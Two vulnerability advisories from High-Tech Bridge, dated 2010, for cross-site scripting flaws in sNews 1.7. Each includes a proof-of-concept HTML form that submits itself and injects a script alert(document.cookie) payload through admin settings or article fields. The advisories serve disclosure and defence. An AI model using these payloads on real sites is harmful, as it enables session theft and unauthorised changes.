Vulnerability ID: HTB22638
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_snews_1.html
Product: sNews
Vendor: sNews Team ( tp://www.snewscms.com/)
Vulnerable Version:1.7and probably prior versions
Vendor Notification:05 October 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "snews.php" script to properly sanitize user-supplied inputin"website_title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/?action=process&task=save_settings" method="post" name="main"><inputtype="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'><inputtype="hidden" name="home_sef" value="home"><inputtype="hidden" name="website_description" value="sNews CMS"><inputtype="hidden" name="website_keywords" value="snews"><inputtype="hidden" name="website_email" value="info (at) mydomain (dot) com [email concealed]"><inputtype="hidden" name="contact_subject" value="Contact Form"><inputtype="hidden" name="language" value="EN"><inputtype="hidden" name="charset" value="UTF-8"><inputtype="hidden" name="date_format" value="d.m.Y.+H:i"><inputtype="hidden" name="article_limit" value="3"><inputtype="hidden" name="rss_limit" value="5"><inputtype="hidden" name="display_page" value="0"><inputtype="hidden" name="num_categories" value="on"><inputtype="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"><inputtype="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"><inputtype="hidden" name="allowed_img" value="gif,jpg,jpeg,png"><inputtype="hidden" name="comment_repost_timer" value="20"><inputtype="hidden" name="comments_order" value="ASC"><inputtype="hidden" name="comment_limit" value="30"><inputtype="hidden" name="word_filter_file" value=""><inputtype="hidden" name="word_filter_change" value=""><inputtype="hidden" name="save" value="Save"></form><script>
document.main.submit();</script>
Vulnerability ID: HTB22637
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_snews.html
Product: sNews
Vendor: sNews Team ( http://www.snewscms.com/)
Vulnerable Version:1.7and probably prior versions
Vendor Notification:05 October 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "snews.php" script to properly sanitize user-supplied inputin"text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/?action=process&task=admin_article&id=2" method="post" name="main"><inputtype="hidden" name="title" value="article title"/><inputtype="hidden" name="seftitle" value="sefurl"/><inputtype="hidden" name="text" value='article text"><script>alert(document.cookie)</script>'/><inputtype="hidden" name="define_category" value="1"/><inputtype="hidden" name="publish_article" value="on"/><inputtype="hidden" name="position" value="1"/><inputtype="hidden" name="description_meta" value="desc"/><inputtype="hidden" name="keywords_meta" value="key"/><inputtype="hidden" name="display_title" value="on"/><inputtype="hidden" name="display_info" value="on"/><inputtype="hidden" name="fposting_day" value="29"/><inputtype="hidden" name="fposting_month" value="9"/><inputtype="hidden" name="fposting_year" value="2010"/><inputtype="hidden" name="fposting_hour" value="16"/><inputtype="hidden" name="fposting_minute" value="40"/><inputtype="hidden" name="task" value="admin_article"/><inputtype="hidden" name="edit_article" value="Edit"/><inputtype="hidden" name="article_category" value="1"/><inputtype="hidden" name="id" value="2"/></form><script>
document.main.submit();</script>
